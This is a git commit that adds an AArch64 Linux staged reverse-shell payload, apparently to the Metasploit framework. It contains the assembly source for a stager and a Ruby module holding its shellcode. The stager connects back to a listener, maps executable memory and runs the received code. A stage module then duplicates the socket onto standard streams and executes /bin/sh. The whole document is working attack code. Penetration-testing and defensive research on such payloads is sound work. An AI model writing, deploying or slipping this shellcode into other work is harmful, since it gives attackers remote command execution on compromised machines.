aarch64 staged shell
parent
8b4ccc66c7
commit
9768a89bcd
|
@ -0,0 +1,96 @@
|
|||
.equ SYS_SOCKET, 0xc6
|
||||
.equ SYS_CONNECT, 0xcb
|
||||
.equ SYS_READ, 0x3f
|
||||
.equ SYS_MMAP, 0xde
|
||||
.equ SYS_EXIT, 0x5d
|
||||
|
||||
.equ AF_INET, 0x2
|
||||
.equ SOCK_STREAM, 0x1
|
||||
|
||||
.equ STDIN, 0x0
|
||||
.equ STDOUT, 0x1
|
||||
.equ STDERR, 0x2
|
||||
|
||||
.equ IP, 0x0100007f
|
||||
.equ PORT, 0x5C11
|
||||
|
||||
start:
|
||||
/* sockfd = socket(AF_INET, SOCK_STREAM, 0) */
|
||||
mov x0, AF_INET
|
||||
mov x1, SOCK_STREAM
|
||||
mov x2, 0
|
||||
mov x8, SYS_SOCKET
|
||||
svc 0
|
||||
mov x12, x0
|
||||
|
||||
/* connect(sockfd, (struct sockaddr *)&server, sockaddr_len) */
|
||||
adr x1, sockaddr
|
||||
mov x2, 0x10
|
||||
mov x8, SYS_CONNECT
|
||||
svc 0
|
||||
cbnz w0, failed
|
||||
|
||||
/* read(sockfd, buf='x1', nbytes=4) */
|
||||
mov x0, x12
|
||||
sub sp, sp, #16
|
||||
mov x1, sp
|
||||
mov x2, #4
|
||||
mov x8, SYS_READ
|
||||
svc 0
|
||||
cbz w0, failed
|
||||
|
||||
ldr x2, [sp,#0]
|
||||
|
||||
/* Page-align, assume <4GB */
|
||||
lsr x2, x2, #12
|
||||
add x2, x2, #1
|
||||
lsl x2, x2, #12
|
||||
|
||||
/* mmap(addr=0, length='x2', prot=7, flags=34, fd=0, offset=0) */
|
||||
mov x0, xzr
|
||||
mov x1, x2
|
||||
mov x2, #7
|
||||
mov x3, #34
|
||||
mov x4, xzr
|
||||
mov x5, xzr
|
||||
/* call mmap() */
|
||||
mov x8, SYS_MMAP
|
||||
svc 0
|
||||
|
||||
/* Grab the saved size, save the address */
|
||||
ldr x4, [sp]
|
||||
|
||||
/* Save the memory address */
|
||||
str x0, [sp]
|
||||
|
||||
/* Read in all of the data */
|
||||
mov x3, x0
|
||||
|
||||
read_loop:
|
||||
/* read(sockfd, buf='x3', nbytes='x4') */
|
||||
mov x0, x12
|
||||
mov x1, x3
|
||||
mov x2, x4
|
||||
/* call read() */
|
||||
mov x8, SYS_READ
|
||||
svc 0
|
||||
add x3, x3, x0
|
||||
subs x4, x4, x0
|
||||
bne read_loop
|
||||
|
||||
/* Go to shellcode */
|
||||
ldr x30, [sp]
|
||||
ret
|
||||
|
||||
failed:
|
||||
mov x0, 0
|
||||
mov x8, SYS_EXIT
|
||||
svc 0
|
||||
|
||||
.balign 4
|
||||
sockaddr:
|
||||
.short AF_INET
|
||||
.short PORT
|
||||
.word IP
|
||||
|
||||
|
|
@ -0,0 +1,105 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
|
||||
require 'msf/core/handler/reverse_tcp'
|
||||
|
||||
|
||||
###
|
||||
#
|
||||
# ReverseTcp
|
||||
# ----------
|
||||
#
|
||||
# Linux reverse TCP stager.
|
||||
#
|
||||
###
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 260
|
||||
|
||||
include Msf::Payload::Stager
|
||||
|
||||
def initialize(info = {})
|
||||
super(merge_info(info,
|
||||
'Name' => 'Reverse TCP Stager',
|
||||
'Description' => 'Connect back to the attacker',
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_AARCH64,
|
||||
'Handler' => Msf::Handler::ReverseTcp,
|
||||
'Stager' =>
|
||||
{
|
||||
'Offsets' =>
|
||||
{
|
||||
'LPORT' => [ 186, 'n' ],
|
||||
'LHOST' => [ 188, 'ADDR' ],
|
||||
},
|
||||
'Payload' =>
|
||||
[
|
||||
0xd2800040, # mov x0, #0x2 // #2
|
||||
0xd2800021, # mov x1, #0x1 // #1
|
||||
0xd2800002, # mov x2, #0x0 // #0
|
||||
0xd28018c8, # mov x8, #0xc6 // #198
|
||||
0xd4000001, # svc #0x0
|
||||
0xaa0003ec, # mov x12, x0
|
||||
0x10000501, # adr x1, b8 <sockaddr>
|
||||
0xd2800202, # mov x2, #0x10 // #16
|
||||
0xd2801968, # mov x8, #0xcb // #203
|
||||
0xd4000001, # svc #0x0
|
||||
0x35000420, # cbnz w0, ac <failed>
|
||||
0xaa0c03e0, # mov x0, x12
|
||||
0xd10043ff, # sub sp, sp, #0x10
|
||||
0x910003e1, # mov x1, sp
|
||||
0xd2800082, # mov x2, #0x4 // #4
|
||||
0xd28007e8, # mov x8, #0x3f // #63
|
||||
0xd4000001, # svc #0x0
|
||||
0x34000340, # cbz w0, ac <failed>
|
||||
0xf94003e2, # ldr x2, [sp]
|
||||
0xd34cfc42, # lsr x2, x2, #12
|
||||
0x91000442, # add x2, x2, #0x1
|
||||
0xd374cc42, # lsl x2, x2, #12
|
||||
0xaa1f03e0, # mov x0, xzr
|
||||
0xaa0203e1, # mov x1, x2
|
||||
0xd28000e2, # mov x2, #0x7 // #7
|
||||
0xd2800443, # mov x3, #0x22 // #34
|
||||
0xaa1f03e4, # mov x4, xzr
|
||||
0xaa1f03e5, # mov x5, xzr
|
||||
0xd2801bc8, # mov x8, #0xde // #222
|
||||
0xd4000001, # svc #0x0
|
||||
0xf94003e4, # ldr x4, [sp]
|
||||
0xf90003e0, # str x0, [sp]
|
||||
0xaa0003e3, # mov x3, x0
|
||||
0xaa0c03e0, # mov x0, x12
|
||||
0xaa0303e1, # mov x1, x3
|
||||
0xaa0403e2, # mov x2, x4
|
||||
0xd28007e8, # mov x8, #0x3f // #63
|
||||
0xd4000001, # svc #0x0
|
||||
0x8b000063, # add x3, x3, x0
|
||||
0xeb000084, # subs x4, x4, x0
|
||||
0x54ffff21, # b.ne 84 <read_loop>
|
||||
0xf94003fe, # ldr x30, [sp]
|
||||
0xd65f03c0, # ret
|
||||
0xd2800000, # mov x0, #0x0 // #0
|
||||
0xd2800ba8, # mov x8, #0x5d // #93
|
||||
0xd4000001, # svc #0x0
|
||||
0x5c110002, # .word 0x5c110002
|
||||
0x0100007f, # .word 0x0100007f
|
||||
].pack("V*")
|
||||
}
|
||||
))
|
||||
end
|
||||
|
||||
def handle_intermediate_stage(conn, payload)
|
||||
print_status("Transmitting stage length value...(#{payload.length} bytes)")
|
||||
|
||||
address_format = 'V'
|
||||
|
||||
# Transmit our intermediate stager
|
||||
conn.put( [ payload.length ].pack(address_format) )
|
||||
|
||||
return true
|
||||
end
|
||||
|
||||
end
|
|
@ -0,0 +1,68 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/base/sessions/command_shell'
|
||||
require 'msf/base/sessions/command_shell_options'
|
||||
|
||||
module MetasploitModule
|
||||
|
||||
include Msf::Sessions::CommandShellOptions
|
||||
|
||||
def initialize(info = {})
|
||||
super(merge_info(info,
|
||||
'Name' => 'Linux dup2 Command Shell',
|
||||
'Description' => 'dup2 socket in x12, then execve',
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_AARCH64,
|
||||
'Session' => Msf::Sessions::CommandShell,
|
||||
'Stage' =>
|
||||
{
|
||||
'Payload' =>
|
||||
[
|
||||
0xaa0c03e0, # mov x0, x12
|
||||
0xd2800002, # mov x2, #0x0 // #0
|
||||
0xd2800001, # mov x1, #0x0 // #0
|
||||
0xd2800308, # mov x8, #0x18 // #24
|
||||
0xd4000001, # svc #0x0
|
||||
0xd2800021, # mov x1, #0x1 // #1
|
||||
0xd2800308, # mov x8, #0x18 // #24
|
||||
0xd4000001, # svc #0x0
|
||||
0xd2800041, # mov x1, #0x2 // #2
|
||||
0xd2800308, # mov x8, #0x18 // #24
|
||||
0xd4000001, # svc #0x0
|
||||
0x10000140, # adr x0, 54 <shell>
|
||||
0xd2800002, # mov x2, #0x0 // #0
|
||||
0xf90003e0, # str x0, [sp]
|
||||
0xf90007e2, # str x2, [sp,#8]
|
||||
0x910003e1, # mov x1, sp
|
||||
0xd2801ba8, # mov x8, #0xdd // #221
|
||||
0xd4000001, # svc #0x0
|
||||
0xd2800000, # mov x0, #0x0 // #0
|
||||
0xd2800ba8, # mov x8, #0x5d // #93
|
||||
0xd4000001, # svc #0x0
|
||||
0x00000000, # .word 0x00000000 // shell
|
||||
0x00000000, # .word 0x00000000
|
||||
0x00000000, # .word 0x00000000
|
||||
0x00000000, # .word 0x00000000
|
||||
].pack("V*")
|
||||
}
|
||||
))
|
||||
register_options([
|
||||
OptString.new('SHELL', [ true, "The shell to execute.", "/bin/sh" ]),
|
||||
])
|
||||
end
|
||||
|
||||
def generate_stage(opts = {})
|
||||
p = super
|
||||
sh = datastore['SHELL']
|
||||
if sh.length >= 16
|
||||
raise ArgumentError, "The specified shell must be less than 16 bytes."
|
||||
end
|
||||
p[84, sh.length] = sh
|
||||
p
|
||||
end
|
||||
|
||||
end
|
Loading…
Reference in New Issue